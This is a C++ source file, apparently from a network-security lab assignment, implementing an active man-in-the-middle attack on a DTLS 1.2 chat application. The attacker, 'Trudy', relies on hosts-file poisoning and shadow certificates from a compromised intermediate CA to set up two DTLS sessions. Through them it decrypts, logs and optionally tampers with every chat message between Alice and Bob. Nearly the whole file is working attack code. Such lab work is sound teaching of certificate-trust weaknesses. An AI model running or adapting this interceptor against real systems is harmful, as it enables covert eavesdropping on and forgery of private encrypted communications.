// secure_chat_active_interceptor.cpp
// Task 4 — active MITM (fake-certificate) attack, run from Trudy.
//
//   ./secure_chat_active_interceptor -m <alice_host> <bob_host> [-t]
//
// Pre-condition: Trudy has poisoned the /etc/hosts of Alice and Bob so that
// each resolves the other's hostname to Trudy's address
// (bash ~/poison-dns-alice1-bob1.sh).  Every datagram then lands on Trudy.
//
// Unlike the Task 3 downgrade attack, Trudy does NOT block chat_START_SSL.
// She relays the plaintext control handshake untouched, then stands up TWO
// independent DTLS 1.2 pipes using shadow certificates that were issued by
// the compromised intermediate CA:
//
//     Alice  <==DTLS==>  Trudy   (Trudy is the server, presents fakebob)
//     Trudy  <==DTLS==>  Bob     (Trudy is the client, presents fakealice)
//
// Both shadow certs verify OK at Alice/Bob because they chain to the trusted
// root.  Trudy therefore decrypts every chat message, logs it, and
// re-encrypts it onto the other pipe — unchanged, or (with -t) with a
// visible tamper marker added to Alice -> Bob messages.
//
// Build:  g++ -o secure_chat_active_interceptor secure_chat_active_interceptor.cpp -lssl -lcrypto -pthread

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <poll.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <netinet/in.h>

#include <iostream>
#include <string>

#include <openssl/ssl.h>
#include <openssl/err.h>
#include <openssl/bio.h>

using namespace std;

#define BUF_SIZE  4096
#define CHAT_PORT 8080

// Shadow credentials (generated by fake_certs/gen_fake_certs.sh) and the
// public trust chain, all relative to src/MITM/.
static const char* FAKEBOB_CHAIN   = "fake_certs/fakebob-fullchain.pem";
static const char* FAKEBOB_KEY     = "fake_certs/fakebob.key.pem";
static const char* FAKEALICE_CHAIN = "fake_certs/fakealice-fullchain.pem";
static const char* FAKEALICE_KEY   = "fake_certs/fakealice.key.pem";
static const char* CA_CHAIN        = "../../certs/chain.pem";
static const char* CIPHERS =
    "ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384";

// ─── helpers ──────────────────────────────────────────────────────────────

static in_addr_t resolveHost(const char* name) {
    struct hostent* h = gethostbyname(name);
    if (!h) { herror("gethostbyname"); exit(EXIT_FAILURE); }
    return ((struct in_addr*)h->h_addr_list[0])->s_addr;
}

static sockaddr_in endpoint(in_addr_t ip) {
    struct sockaddr_in a;
    memset(&a, 0, sizeof(a));
    a.sin_family      = AF_INET;
    a.sin_addr.s_addr = ip;
    a.sin_port        = htons(CHAT_PORT);
    return a;
}

static void die(const char* what) {
    ERR_print_errors_fp(stderr);
    fprintf(stderr, "[trudy] fatal: %s\n", what);
    exit(EXIT_FAILURE);
}

// Same fixed demo cookie the chat app uses on its server side.
static int cookie_gen(SSL*, unsigned char* c, unsigned int* len) {
    memcpy(c, "ses_co", 6); *len = 6; return 1;
}
static int cookie_ok(SSL*, const unsigned char*, unsigned int) { return 1; }

// Build a DTLS 1.2 context that presents <chain>/<key> and trusts the real
// CA chain (so the genuine peer certificate still verifies and can be logged).
static SSL_CTX* make_ctx(bool as_server, const char* chain, const char* key) {
    SSL_CTX* ctx = SSL_CTX_new(DTLS_method());
    if (!ctx) die("SSL_CTX_new");

    SSL_CTX_set_min_proto_version(ctx, DTLS1_2_VERSION);
    SSL_CTX_set_security_level(ctx, 1);
    SSL_CTX_set_session_cache_mode(ctx, SSL_SESS_CACHE_OFF);

    if (SSL_CTX_set_cipher_list(ctx, CIPHERS) != 1)               die("cipher_list");
    if (SSL_CTX_use_certificate_chain_file(ctx, chain) <= 0)      die("use_certificate_chain_file");
    if (SSL_CTX_use_PrivateKey_file(ctx, key, SSL_FILETYPE_PEM) <= 0) die("use_PrivateKey_file");
    if (!SSL_CTX_check_private_key(ctx))                          die("check_private_key");
    if (!SSL_CTX_load_verify_locations(ctx, CA_CHAIN, NULL))      die("load_verify_locations");

    SSL_CTX_set_verify(ctx, SSL_VERIFY_PEER, NULL);   // request+verify the real peer cert
    if (as_server) {
        SSL_CTX_set_cookie_generate_cb(ctx, cookie_gen);
        SSL_CTX_set_cookie_verify_cb(ctx, cookie_ok);
    }
    return ctx;
}

static void report_pipe(SSL* ssl, const char* label) {
    printf("[trudy] %s\n", label);
    printf("[trudy]     cipher : %s\n", SSL_get_cipher(ssl));
    X509* peer = SSL_get_peer_certificate(ssl);
    if (peer) {
        char sub[300];
        X509_NAME_oneline(X509_get_subject_name(peer), sub, sizeof(sub));
        printf("[trudy]     peer   : %s (verify %s)\n", sub,
               SSL_get_verify_result(ssl) == X509_V_OK ? "OK" : "FAILED");
        X509_free(peer);
    }
}

// ─── main ─────────────────────────────────────────────────────────────────

int main(int argc, char** argv) {
    setvbuf(stdout, NULL, _IOLBF, 0);          // line-buffered for `| tee`

    if (argc < 4 || strcmp(argv[1], "-m") != 0) {
        fprintf(stderr, "Usage: %s -m <alice_host> <bob_host> [-t]\n", argv[0]);
        return 1;
    }
    const bool tamper = (argc >= 5 && strcmp(argv[4], "-t") == 0);

    in_addr_t alice_ip = resolveHost(argv[2]);
    in_addr_t bob_ip   = resolveHost(argv[3]);
    struct in_addr tmp;
    tmp.s_addr = alice_ip; string alice_s = inet_ntoa(tmp);
    tmp.s_addr = bob_ip;   string bob_s   = inet_ntoa(tmp);
    printf("[trudy] active MITM armed — Alice=%s  Bob=%s  tamper=%s\n",
           alice_s.c_str(), bob_s.c_str(), tamper ? "ON (Alice->Bob)" : "off");

    SSL_load_error_strings();
    OpenSSL_add_ssl_algorithms();

    // ---- two UDP sockets: one facing Alice, one facing Bob --------------
    const char* bindEnv = getenv("SC_BIND_ADDR");   // test-only override
    int sA = socket(AF_INET, SOCK_DGRAM, 0);
    struct sockaddr_in ba = endpoint(bindEnv ? inet_addr(bindEnv) : htonl(INADDR_ANY));
    if (bind(sA, (sockaddr*)&ba, sizeof(ba)) != 0) { perror("bind(alice-facing)"); return 1; }

    int sB = socket(AF_INET, SOCK_DGRAM, 0);
    struct sockaddr_in bob_ep = endpoint(bob_ip);
    if (connect(sB, (sockaddr*)&bob_ep, sizeof(bob_ep)) != 0) { perror("connect(bob)"); return 1; }

    struct sockaddr_in alice_ep = endpoint(alice_ip);   // ephemeral port learned below
    socklen_t alen = sizeof(alice_ep);
    char buf[BUF_SIZE];

    auto to_alice = [&](const string& s) {
        sendto(sA, s.data(), s.size(), 0, (sockaddr*)&alice_ep, alen);
    };
    auto to_bob = [&](const string& s) { send(sB, s.data(), s.size(), 0); };

    auto from_alice = [&](const char* expect) -> string {
        int n = recvfrom(sA, buf, BUF_SIZE - 1, 0, (sockaddr*)&alice_ep, &alen);
        if (n <= 0) { perror("recvfrom(alice)"); exit(EXIT_FAILURE); }
        string s(buf, n);
        printf("[trudy] Alice -> Trudy : %s\n", s.c_str());
        if (expect && s != expect) {
            fprintf(stderr, "[trudy] expected '%s', got '%s'\n", expect, s.c_str());
            exit(EXIT_FAILURE);
        }
        return s;
    };
    auto from_bob = [&](const char* expect) -> string {
        int n = recv(sB, buf, BUF_SIZE - 1, 0);
        if (n <= 0) { perror("recv(bob)"); exit(EXIT_FAILURE); }
        string s(buf, n);
        printf("[trudy] Bob   -> Trudy : %s\n", s.c_str());
        if (expect && s != expect) {
            fprintf(stderr, "[trudy] expected '%s', got '%s'\n", expect, s.c_str());
            exit(EXIT_FAILURE);
        }
        return s;
    };

    // ---- Phase 1: relay the plaintext control handshake untouched -------
    to_bob  (from_alice("chat_hello"));
    to_alice(from_bob  ("chat_reply_ok"));
    to_bob  (from_alice("chat_START_SSL"));
    to_alice(from_bob  ("chat_START_SSL_ACK"));
    printf("[trudy] control handshake relayed — building the two DTLS pipes\n");

    // ---- Phase 2a: DTLS server facing Alice (Trudy = "Bob") ------------
    SSL_CTX* ctxA = make_ctx(true, FAKEBOB_CHAIN, FAKEBOB_KEY);
    SSL*     sslA = SSL_new(ctxA);
    BIO*     bioA = BIO_new_dgram(sA, BIO_NOCLOSE);
    struct timeval tv = { 5, 0 };
    BIO_ctrl(bioA, BIO_CTRL_DGRAM_SET_RECV_TIMEOUT, 0, &tv);
    SSL_set_bio(sslA, bioA, bioA);

    BIO_ADDR* who = BIO_ADDR_new();
    int lr;
    do { lr = DTLSv1_listen(sslA, who); } while (lr == 0);   // 0 = keep waiting
    if (lr < 0) die("DTLSv1_listen(alice)");
    BIO_ADDR_free(who);
    if (SSL_accept(sslA) <= 0) die("SSL_accept(alice)");
    report_pipe(sslA, "pipe 1 UP  —  Alice believes she is talking to Bob (fakebob)");

    // ---- Phase 2b: DTLS client facing Bob (Trudy = "Alice") -----------
    SSL_CTX* ctxB = make_ctx(false, FAKEALICE_CHAIN, FAKEALICE_KEY);
    SSL*     sslB = SSL_new(ctxB);
    SSL_set_fd(sslB, sB);
    if (SSL_connect(sslB) <= 0) die("SSL_connect(bob)");
    report_pipe(sslB, "pipe 2 UP  —  Bob believes he is talking to Alice (fakealice)");

    printf("[trudy] MITM proxy active — decrypting, logging%s, re-encrypting\n",
           tamper ? " and TAMPERING" : "");

    // ---- Phase 3: shuttle decrypted records between the two pipes ------
    struct pollfd pfd[2] = { { sA, POLLIN, 0 }, { sB, POLLIN, 0 } };
    bool done = false;
    while (!done) {
        if (poll(pfd, 2, -1) < 0) break;

        if (pfd[0].revents & POLLIN) {                       // Alice -> Bob
            int n = SSL_read(sslA, buf, BUF_SIZE - 1);
            if (n <= 0) {
                if (SSL_get_error(sslA, n) != SSL_ERROR_WANT_READ) {
                    printf("[trudy] Alice pipe closed\n"); break;
                }
            } else {
                string msg(buf, n);
                printf("[trudy] Alice -> Bob  (decrypted): %s\n", msg.c_str());
                string out = (tamper && msg != "exit") ? msg + "  [tampered by Trudy]" : msg;
                if (out != msg) printf("[trudy]     re-encrypted as: %s\n", out.c_str());
                SSL_write(sslB, out.data(), out.size());
                if (msg == "exit") done = true;
            }
        }
        if (!done && (pfd[1].revents & POLLIN)) {            // Bob -> Alice
            int n = SSL_read(sslB, buf, BUF_SIZE - 1);
            if (n <= 0) {
                if (SSL_get_error(sslB, n) != SSL_ERROR_WANT_READ) {
                    printf("[trudy] Bob pipe closed\n"); break;
                }
            } else {
                string msg(buf, n);
                printf("[trudy] Bob -> Alice  (decrypted): %s\n", msg.c_str());
                SSL_write(sslA, msg.data(), msg.size());
                if (msg == "exit") done = true;
            }
        }
    }

    SSL_shutdown(sslA); SSL_shutdown(sslB);
    SSL_free(sslA);     SSL_free(sslB);
    SSL_CTX_free(ctxA); SSL_CTX_free(ctxB);
    close(sA);          close(sB);
    printf("[trudy] done\n");
    return 0;
}
